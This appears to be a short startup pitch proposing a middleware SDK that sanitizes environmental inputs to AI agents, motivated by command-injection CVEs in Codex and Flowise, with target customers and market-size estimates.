Agent frameworks do not enforce systematic sanitization of environmental inputs — branch names, file paths, config strings — before passing them into execution contexts, enabling command injection attacks that exploit the agent's own inherited permissions. The OpenAI Codex and Flowise CVEs this week demonstrate this is a class-level vulnerability, not isolated incidents: agents trust environmental data by default and execute it with the full privilege of their credential set. No standard trust boundary model exists that distinguishes data from instructions at the agent execution layer.

Agent frameworks blindly pass environmental inputs (branch names, file paths, configs) into execution contexts without sanitization, enabling injection attacks that inherit the agent's full permissions — as proven by this week's Codex and Flowise CVEs.

Platform engineering and security teams at companies deploying AI coding agents, DevOps agents, or agentic workflows that interact with untrusted environmental data.

Security teams are actively scrambling to audit agent deployments after the Codex/Flowise CVEs with zero standardized tooling; enterprises already pay $50-500K/yr for AppSec tools (Snyk, Wiz) and will pay for the agent-layer equivalent the moment it exists — and that moment is now.

MVP is a lightweight middleware SDK (Python/TS) that wraps agent tool-call boundaries with a policy engine: classify every input as data vs. instruction, enforce sanitization rules per context type (shell, SQL, file path), and log/block policy violations — ship as a drop-in for LangChain, CrewAI, and OpenAI Agents SDK within weeks.

Agent security is a new sub-segment of the ~$20B application security market; with hundreds of thousands of companies adopting agentic workflows in 2025, the near-term TAM is $1-3B and growing with every new agent framework.